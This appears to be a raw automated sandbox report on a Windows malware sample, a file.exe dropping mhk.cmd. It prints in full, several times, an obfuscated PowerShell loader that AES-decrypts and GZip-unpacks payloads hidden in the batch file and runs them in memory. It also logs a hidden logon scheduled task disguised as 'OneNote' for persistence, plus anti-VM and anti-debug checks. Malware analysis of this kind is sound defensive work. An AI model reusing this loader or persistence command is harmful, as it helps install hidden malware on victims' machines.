    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4650Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5196Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4402Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2426Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7525Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2144Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7461Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2210Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4708
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3511
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3712
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1106
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7451
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2078
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8294
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1300
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep count: 4650 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep count: 5196 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep time: -6456360425798339s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep count: 4402 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep count: 2426 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep time: -5534023222112862s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004Thread sleep time: -5534023222112862s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep time: -4611686018427385s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep count: 4708 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080Thread sleep time: -20291418481080494s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8052Thread sleep count: 3511 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1308Thread sleep count: 3712 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1308Thread sleep count: 1106 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3288Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5816Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3732Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep time: -7378697629483816s >= -30000s
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A36407C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF65A36407C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A37B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF65A37B110
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A38FC20 FindFirstFileExA,0_2_00007FF65A38FC20
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A381624 VirtualQuery,GetSystemInfo,0_2_00007FF65A381624
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: file.exe, 00000000.00000002.1705956338.000001ACBFD3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
    Source: powershell.exe, 0000001B.00000002.2630221027.0000013D005FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
    Source: powershell.exe, 0000001B.00000002.2630221027.0000013D005FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
    Source: file.exe, 00000000.00000003.1704251351.000001ACBFDC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: powershell.exe, 0000001B.00000002.2630221027.0000013D005FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A3830F0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF65A3830F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A390CA0 GetProcessHeap,0_2_00007FF65A390CA0
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A3830F0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF65A3830F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A382490 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF65A382490
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A3832D4 SetUnhandledExceptionFilter,0_2_00007FF65A3832D4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A387658 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF65A387658
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A37B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF65A37B110
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\mhk.cmd" "Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\mhk.cmd" Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\mhk.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); "Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\mhk')Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -ForceJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network64476Man.cmd"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network64476Man.cmd"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network64476Man.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network64476Man')
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\mhk.cmd';$rtyv='rezykvadzykvlizykvneszykv'.replace('zykv', ''),'etumkntumktrtumkypotumkitumkntumkttumk'.replace('tumk', ''),'crigeoeaigeoteigeodigeoecigeorypigeotoigeorigeo'.replace('igeo', ''),'tghdlranghdlsghdlfghdloghdlrmghdlfighdlnalghdlbghdlloghdlckghdl'.replace('ghdl', ''),'ggynuegynutgynucugynurrgynuengynutpgynurgynuocegynusgynusgynu'.replace('gynu', ''),'loalbokdlbok'.replace('lbok', ''),'elrofderofdmerofdntarofdtrofd'.replace('rofd', ''),'shhcaplihhcathhca'.replace('hhca', ''),'frolqelmblqelalqelslqelelqel6lqel4lqelstlqelrinlqelglqel'.replace('lqel', ''),'mkropainkropmkropodkropukroplekrop'.replace('krop', ''),'cocpycpytcpycocpyc'.replace('cpyc', ''),'decwuerowuermprwuereswuerswuer'.replace('wuer', ''),'chqcmhahqcmnhqcmgeehqcmxthqcmenshqcmiohqcmnhqcm'.replace('hqcm', ''),'inpsjavopsjakpsjaepsja'.replace('psja', '');powershell -w hidden;function tnioj($epehv){$iyroy=[system.security.cryptography.aes]::create();$iyroy.mode=[system.security.cryptography.ciphermode]::cbc;$iyroy.padding=[system.security.cryptography.paddingmode]::pkcs7;$iyroy.key=[system.convert]::($rtyv[8])('saaw/5aaxuahemfj4gdvf4efnk5mel+mrvinwcktw5a=');$iyroy.iv=[system.convert]::($rtyv[8])('5qrexrx1mz3ezx5v7wynkq==');$vcojp=$iyroy.($rtyv[2])();$vyqzb=$vcojp.($rtyv[3])($epehv,0,$epehv.length);$vcojp.dispose();$iyroy.dispose();$vyqzb;}function ummxi($epehv){$vtwcn=new-object system.io.memorystream(,$epehv);$wwnvp=new-object system.io.memorystream;$guujf=new-object system.io.compression.gzipstream($vtwcn,[io.compression.compressionmode]::($rtyv[11]));$guujf.($rtyv[10])($wwnvp);$guujf.dispose();$vtwcn.dispose();$wwnvp.dispose();$wwnvp.toarray();}$sqmzi=[system.io.file]::($rtyv[0])([console]::title);$fexoj=ummxi (tnioj ([convert]::($rtyv[8])([system.linq.enumerable]::($rtyv[6])($sqmzi, 5).substring(2))));$sgtuk=ummxi (tnioj ([convert]::($rtyv[8])([system.linq.enumerable]::($rtyv[6])($sqmzi, 6).substring(2))));[system.reflection.assembly]::($rtyv[5])([byte[]]$sgtuk).($rtyv[1]).($rtyv[13])($null,$null);[system.reflection.assembly]::($rtyv[5])([byte[]]$fexoj).($rtyv[1]).($rtyv[13])($null,$null); "
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'onenote 64476' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\network64476man.cmd') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -force
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\network64476man.cmd';$rtyv='rezykvadzykvlizykvneszykv'.replace('zykv', ''),'etumkntumktrtumkypotumkitumkntumkttumk'.replace('tumk', ''),'crigeoeaigeoteigeodigeoecigeorypigeotoigeorigeo'.replace('igeo', ''),'tghdlranghdlsghdlfghdloghdlrmghdlfighdlnalghdlbghdlloghdlckghdl'.replace('ghdl', ''),'ggynuegynutgynucugynurrgynuengynutpgynurgynuocegynusgynusgynu'.replace('gynu', ''),'loalbokdlbok'.replace('lbok', ''),'elrofderofdmerofdntarofdtrofd'.replace('rofd', ''),'shhcaplihhcathhca'.replace('hhca', ''),'frolqelmblqelalqelslqelelqel6lqel4lqelstlqelrinlqelglqel'.replace('lqel', ''),'mkropainkropmkropodkropukroplekrop'.replace('krop', ''),'cocpycpytcpycocpyc'.replace('cpyc', ''),'decwuerowuermprwuereswuerswuer'.replace('wuer', ''),'chqcmhahqcmnhqcmgeehqcmxthqcmenshqcmiohqcmnhqcm'.replace('hqcm', ''),'inpsjavopsjakpsjaepsja'.replace('psja', '');powershell -w hidden;function tnioj($epehv){$iyroy=[system.security.cryptography.aes]::create();$iyroy.mode=[system.security.cryptography.ciphermode]::cbc;$iyroy.padding=[system.security.cryptography.paddingmode]::pkcs7;$iyroy.key=[system.convert]::($rtyv[8])('saaw/5aaxuahemfj4gdvf4efnk5mel+mrvinwcktw5a=');$iyroy.iv=[system.convert]::($rtyv[8])('5qrexrx1mz3ezx5v7wynkq==');$vcojp=$iyroy.($rtyv[2])();$vyqzb=$vcojp.($rtyv[3])($epehv,0,$epehv.length);$vcojp.dispose();$iyroy.dispose();$vyqzb;}function ummxi($epehv){$vtwcn=new-object system.io.memorystream(,$epehv);$wwnvp=new-object system.io.memorystream;$guujf=new-object system.io.compression.gzipstream($vtwcn,[io.compression.compressionmode]::($rtyv[11]));$guujf.($rtyv[10])($wwnvp);$guujf.dispose();$vtwcn.dispose();$wwnvp.dispose();$wwnvp.toarray();}$sqmzi=[system.io.file]::($rtyv[0])([console]::title);$fexoj=ummxi (tnioj ([convert]::($rtyv[8])([system.linq.enumerable]::($rtyv[6])($sqmzi, 5).substring(2))));$sgtuk=ummxi (tnioj ([convert]::($rtyv[8])([system.linq.enumerable]::($rtyv[6])($sqmzi, 6).substring(2))));[system.reflection.assembly]::($rtyv[5])([byte[]]$sgtuk).($rtyv[1]).($rtyv[13])($null,$null);[system.reflection.assembly]::($rtyv[5])([byte[]]$fexoj).($rtyv[1]).($rtyv[13])($null,$null); "
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'onenote 64476' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\network64476man.cmd') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -force
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\mhk.cmd';$rtyv='rezykvadzykvlizykvneszykv'.replace('zykv', ''),'etumkntumktrtumkypotumkitumkntumkttumk'.replace('tumk', ''),'crigeoeaigeoteigeodigeoecigeorypigeotoigeorigeo'.replace('igeo', ''),'tghdlranghdlsghdlfghdloghdlrmghdlfighdlnalghdlbghdlloghdlckghdl'.replace('ghdl', ''),'ggynuegynutgynucugynurrgynuengynutpgynurgynuocegynusgynusgynu'.replace('gynu', ''),'loalbokdlbok'.replace('lbok', ''),'elrofderofdmerofdntarofdtrofd'.replace('rofd', ''),'shhcaplihhcathhca'.replace('hhca', ''),'frolqelmblqelalqelslqelelqel6lqel4lqelstlqelrinlqelglqel'.replace('lqel', ''),'mkropainkropmkropodkropukroplekrop'.replace('krop', ''),'cocpycpytcpycocpyc'.replace('cpyc', ''),'decwuerowuermprwuereswuerswuer'.replace('wuer', ''),'chqcmhahqcmnhqcmgeehqcmxthqcmenshqcmiohqcmnhqcm'.replace('hqcm', ''),'inpsjavopsjakpsjaepsja'.replace('psja', '');powershell -w hidden;function 